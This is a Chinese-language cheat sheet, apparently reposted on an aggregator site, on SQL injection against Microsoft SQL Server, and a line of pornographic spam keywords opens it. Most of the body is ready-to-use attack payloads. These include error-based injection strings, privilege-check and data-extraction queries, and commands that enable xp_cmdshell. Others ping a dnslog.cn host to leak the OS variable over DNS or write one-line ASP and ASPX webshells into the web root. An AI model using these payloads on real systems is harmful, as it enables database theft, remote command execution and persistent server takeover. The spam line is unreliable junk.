国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

MSsql數(shù)據(jù)庫 sql注入

這篇具有很好參考價(jià)值的文章主要介紹了MSsql數(shù)據(jù)庫 sql注入。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

  • 和mysql不同;每個(gè)數(shù)據(jù)庫都有自己的信息總結(jié)表
  • 四個(gè)系統(tǒng)數(shù)據(jù)庫
    • master
      • sysdatabases :所有數(shù)據(jù)庫信息
        • name :所有數(shù)據(jù)庫名
      • sysobjects :數(shù)據(jù)庫所有對(duì)象的信息
      • syscolumns :字段信息
      • 固定字段名
        • name 對(duì)象名
        • id 對(duì)象id
        • xtype 對(duì)象類型代碼
          • xtype='U' 用戶創(chuàng)建的表
          • xtype='S' 系統(tǒng)表
    • model
      • sysobjects
      • syscolumns
    • msdb
      • sysobjects
      • syscolumns
    • tempdb
      • sysobjects
      • syscolumns
  • 用戶自己創(chuàng)建的數(shù)據(jù)庫也會(huì)自動(dòng)攜帶下面字段
    • sysobjects
    • syscolumns
  • 常用函數(shù)
    • db_name() :數(shù)據(jù)庫名
    • host_name() :主機(jī)名
    • current_user :返回?cái)?shù)據(jù)庫當(dāng)前的用戶名
    • user :用戶
    • substring() :截取函數(shù);不能用substr()
    • @@verison :查看數(shù)據(jù)庫版本
    • char() :ascii碼轉(zhuǎn)字符
    • cast(text as type() :字符類型轉(zhuǎn)換;轉(zhuǎn)化失敗就會(huì)以text結(jié)果顯示在頁面上
    • object_id() :根據(jù)表名返回?cái)?shù)據(jù)庫表名id
    • object_name() :根據(jù)id返回?cái)?shù)據(jù)庫表名
    • col_name(object_id,column_id) :返回指定表中指定字段的名稱
    • col_name(object_id('users'),2)
  • 調(diào)用表名
    • 數(shù)據(jù)庫名.用戶名.表名
  • 報(bào)錯(cuò)注入
    • 'or 1=convert(int,@@version)--
    • 1-user
    • 1/user
    • convert(int,user)
    • db_name()
  • 注入流程
    • 判斷權(quán)限
      • 權(quán)限:sa 、db_owner 、public
      • and 1=(select IS_SRVROLEMEMBER('sysadmin')) --
      • and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
      • and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
      • and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
      • and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
      • and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
      • and 1=(select IS_MEMBER('db_owner'));-
    • 獲取當(dāng)前數(shù)據(jù)庫
      • and 1=(select db_name()) --
    • 獲取當(dāng)前數(shù)據(jù)庫的表名
      • and 1=convert(int,(select quotename(name) from 數(shù)據(jù)庫名..sysobjects where xtype='U' FOR XML PATH(''))) --
    • 獲取當(dāng)前數(shù)據(jù)庫中表的所有字段
      • and 1=(select quotename(name) from 數(shù)據(jù)庫名..syscolumns where id =(select id from 數(shù)據(jù)庫名..sysobjects where name='指定表名') FOR XML PATH(''))--
    • 讀取內(nèi)容
      • and 1=(select top 1 * from 指定數(shù)據(jù)庫..指定表名 where排除條件 FOR XML PATH(''))--
  • 命令執(zhí)行
    • 開啟xp_cmdshell,0為關(guān)閉,1為開啟
      • ;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE; --
    • 關(guān)閉xp_cmdshell
      • ;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',0;RECONFIGURE; --
    • 執(zhí)行ping判斷是否能執(zhí)行xp_cmdshell和服務(wù)器是否通外網(wǎng)
      • ;exec master..xp_cmdshell "ping teki6x.dnslog.cn" –
      • ;execute('xp_cmdshell "“’)
      • ;exec xp_cmdshell ' ping%20%25os%25.4mt18t.dnslog.cn '
    • 寫入一句話木馬;需要知道網(wǎng)站根目錄
      • asp
        • ;exec master..xp_cmdshell 'echo ^<%25eval request(1234)%25^> > C:\Inetpub\wwwroot\test.asp' --
      • aspx
        • ;exec master..xp_cmdshell 'echo ^<%25@ Page Language="Jscript"%25^>^<%25eval(Request.Item["aaa"],"unsafe");%25^> > C:\Inetpub\wwwroot\test.aspx' --

文章來源地址http://www.zghlxwxcb.cn/news/detail-846337.html

到了這里,關(guān)于MSsql數(shù)據(jù)庫 sql注入的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【實(shí)訓(xùn)04】數(shù)據(jù)庫SQL注入漏洞

    【實(shí)訓(xùn)04】數(shù)據(jù)庫SQL注入漏洞

    ? 下載dvwa的時(shí)候其實(shí)已經(jīng)通過了,但建議全部做一下,后面的要用 git clone GitHub - digininja/DVWA: Damn Vulnerable Web Application (DVWA) 注入的sql: 使用sql注入查詢數(shù)據(jù)庫用戶名和數(shù)據(jù)庫名,并將用戶名和數(shù)據(jù)庫名寫入/data/workspace/myshixun/result2中: 注入的sql語句: 使用sql注入查詢dvwa數(shù)據(jù)庫

    2024年02月16日
    瀏覽(20)
  • 【數(shù)據(jù)庫】SQL注入從0到1

    【數(shù)據(jù)庫】SQL注入從0到1

    目錄 前言: 1.【入門】普通查詢型注入: 1.0 實(shí)驗(yàn)環(huán)境: 1.1進(jìn)行一次普通的查詢: 1.2 進(jìn)行注入得到用戶信息: 1.2.1 執(zhí)行注入: 1.2.2 注入語句分析: 1.3 整型注入與字符型注入?yún)^(qū)別: 2.【進(jìn)階】從庫到列逐步注入: 2.1 預(yù)備知識(shí): 2.1.1 union函數(shù): 2.1.2 order by函數(shù): 2.1.3 infor

    2024年02月05日
    瀏覽(26)
  • 【Oracle】使用 SQL Developer 連接 Oracle 數(shù)據(jù)庫

    SQL Developer 是 Oracle 官方推出的一款免費(fèi)的數(shù)據(jù)庫開發(fā)工具,它提供了豐富的數(shù)據(jù)庫開發(fā)功能,其中包括連接 Oracle 數(shù)據(jù)庫的功能。 在本文中,我們將從多個(gè)方面詳細(xì)闡述如何使用 SQL Developer 連接 Oracle 數(shù)據(jù)庫。 在連接 Oracle 數(shù)據(jù)庫前,需要需要做一些準(zhǔn)備工作,包括安裝 SQ

    2024年02月06日
    瀏覽(24)
  • 【數(shù)據(jù)庫】日常使用PL/SQL 登錄ORACLE 數(shù)據(jù)庫查詢數(shù)據(jù)

    一、PL/SQL 登錄方式 username: ##訪問數(shù)據(jù)庫的賬號(hào) password: ##訪問數(shù)據(jù)庫的密碼 Databse: ##數(shù)據(jù)庫IP地址/實(shí)例名 數(shù)據(jù)庫集群心跳地址/實(shí)例名 Connect as : ##Normal,如果使用sysdba賬戶登錄選擇SYSDBA 二、PL/SQL使用SQL語句查詢 點(diǎn)擊上方導(dǎo)航欄,New,選擇SQL Window,即可再次輸入要查詢的

    2024年02月19日
    瀏覽(30)
  • win11 下 SQL2008數(shù)據(jù)庫 SQLServer Management Studio 無法使用的問題

    win11 下 SQL2008數(shù)據(jù)庫 SQLServer Management Studio 無法使用的問題

    系統(tǒng)升級(jí)到win11后,SqlServer2008數(shù)據(jù)庫的管理工作SQLServer Management Studio 點(diǎn)擊后沒反應(yīng)。經(jīng)過測(cè)試數(shù)據(jù)庫服務(wù)正常,只是管理工具無法使用。單獨(dú)安裝一個(gè)高版本的管理工具,問題解決。 我是下載的Sql Management Studio,鏈接如下:https://download.microsoft.com/download/8/a/8/8a8073d2-2e00-472b

    2024年02月11日
    瀏覽(99)
  • 用SQL語句操作Oracle數(shù)據(jù)庫——數(shù)據(jù)更新

    用SQL語句操作Oracle數(shù)據(jù)庫——數(shù)據(jù)更新

    數(shù)據(jù)庫中的數(shù)據(jù)更新操作有3種:1)向表中添加若干行數(shù)據(jù)(增);2)刪除表中的若干行數(shù)據(jù)(刪);3)修改表中的數(shù)據(jù)(改)。對(duì)于這3種操作,SQL語言中有3種相應(yīng)的語句與之對(duì)應(yīng)。接下來讓我們逐一詳細(xì)地了解一下。 本文我們依然使用以下三個(gè)表來進(jìn)行數(shù)據(jù)更新操作:

    2024年01月19日
    瀏覽(34)
  • 【網(wǎng)絡(luò)安全---sql注入(2)】如何通過SQL注入getshell?如何通過SQL注入讀取文件或者數(shù)據(jù)庫數(shù)據(jù)?一篇文章告訴你過程和原理。

    【網(wǎng)絡(luò)安全---sql注入(2)】如何通過SQL注入getshell?如何通過SQL注入讀取文件或者數(shù)據(jù)庫數(shù)據(jù)?一篇文章告訴你過程和原理。

    分享一個(gè)非常詳細(xì)的網(wǎng)絡(luò)安全筆記,是我學(xué)習(xí)網(wǎng)安過程中用心寫的,可以點(diǎn)開以下鏈接獲?。?超詳細(xì)的網(wǎng)絡(luò)安全筆記 本篇博客主要是通過piakchu靶場(chǎng)來講解如何通過SQL注入漏洞來寫入文件,讀取文件。通過SQL輸入來注入木馬來getshell等,講解了比較詳細(xì)的過程; 如果想要學(xué)習(xí)

    2024年02月07日
    瀏覽(29)
  • 【Oracle 數(shù)據(jù)庫 SQL 語句 】積累1

    【Oracle 數(shù)據(jù)庫 SQL 語句 】積累1

    : grouping sets ((分組字段1,分組字段2),()) : coalesce合并多個(gè)字段,顯示第一個(gè)不為null的值

    2024年02月13日
    瀏覽(30)
  • Sql server 連接 Oracle數(shù)據(jù)庫

    Sql server 連接 Oracle數(shù)據(jù)庫

    前提預(yù)警:本機(jī)必須裝有Oracle客戶端 檢查是否安裝Oracle客戶端,并檢查TNS信息是否配置完成 1.1、 在cmd中執(zhí)行 sqlplus ,沒有報(bào)錯(cuò)并出現(xiàn)Oracle版本號(hào),則表示Oracle已安裝 1.2、配置TNS信息(最上面的10.0.0.130可隨意定義,eg:test、orcl、qerghasd…) 配置ODBC數(shù)據(jù)信息 2.1、打開ODBC數(shù)據(jù)

    2024年02月03日
    瀏覽(21)
  • 滲透測(cè)試-SQL注入之核心語法獲取數(shù)據(jù)庫信息

    滲透測(cè)試-SQL注入之核心語法獲取數(shù)據(jù)庫信息

    SQL實(shí)驗(yàn)室第一關(guān) 下載sqli-labs到phpstudy的www目錄下 打開localhost/sqli-labs運(yùn)行即可 (1)注入語句 ‘~’ 相當(dāng)于16進(jìn)制的0x7e 萬能密碼 \\\'or ‘1’ =\\\'1 ’ and ‘1’=‘1 ’ and 1=2 union select 1,user(),3- -+ 前面加’是為了閉合后面的’ (2)group_concat(string) (1)SQL手工注入方法 select schema_name

    2024年02月10日
    瀏覽(19)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包